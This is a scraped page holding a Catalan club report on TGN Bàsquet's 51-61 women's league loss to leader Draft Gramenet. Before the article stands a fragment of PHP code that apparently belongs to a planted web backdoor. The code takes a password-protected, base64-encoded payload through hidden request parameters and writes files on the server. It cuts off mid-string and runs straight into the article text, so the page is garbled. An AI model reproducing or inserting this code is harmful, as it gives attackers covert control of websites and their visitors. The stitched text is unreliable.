function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN planta cara al líder (51-61) - Tgn Bàsquet Club -

El TGN planta cara al líder (51-61)

Updated: gener 27, 2024

Partit corresponent a la quinzena jornada de Supercopa Catalunya femenina, on el Sènior A ha rebut la visita del Draft Gramenet, líder de la categoria amb un balanç de 13 victories i 1 derrota.

El partit va començar amb un ritme molt elevat per part dels dos equips. El Draft Gramenet va proposar un joc molt dinàmic, amb un atac veloç i una defensa molt agressiva a tot el camp, però les jugadores del TGN van entrar al partit més concentrades i van aconseguir les primeres iniciatives al marcador. Tot i això, l’equip visitant va anar creixent a base d’una asfixiant defensa que va provocar diversos errors del TGN, capgirant el marcador al final del primer acte (14-18).

El segon periode va estar marcat per la igualtat entre els dos conjunts. L’equip entrenat per Israel Esteve va mostrar caràcter i va jugar de tu a tu davant del líder de la categoria, aconseguint posar-se per davant en certs moments. Novament, un parell de pèrdues provocades per la defensa del Draft i dues cistelles en l’últim minut de la primera part van deixar el marcador en un 28-31 favorables a les de Sta Coloma.

Després de passar per vestidors, les visitants van aconseguir el primer avantatge considerable del partit, situant-se 8 punts per sobre de l’equip lila a l’equador del tercer quart. Quan semblava que el partit es podia trencar, va tornar a aparèixer la versió més combativa del TGN: el nivell defensiu de les liles va pujar considerablement i es van aconseguir bones seleccions de tir en atac que van tornar a igualar el partit (43-46).

Tot apuntava que tindríem un final igualat al pavelló del Sagrat Cor, més encara quan un triple de Sara Torruella posava a les tarragonines per davant al minut 33 de partit, però les visitants van tornar a demostrar perquè són les líders de Super Copa i van firmar un parcial letal de 2-11 que va acabar enfonsant a un TGN que va merèixer més. El resultat final va ser de 51-61.

A la propera jornada, el TGN visitarà la pista del AB Premià, el dissabte 3 de febrer a les 17h45.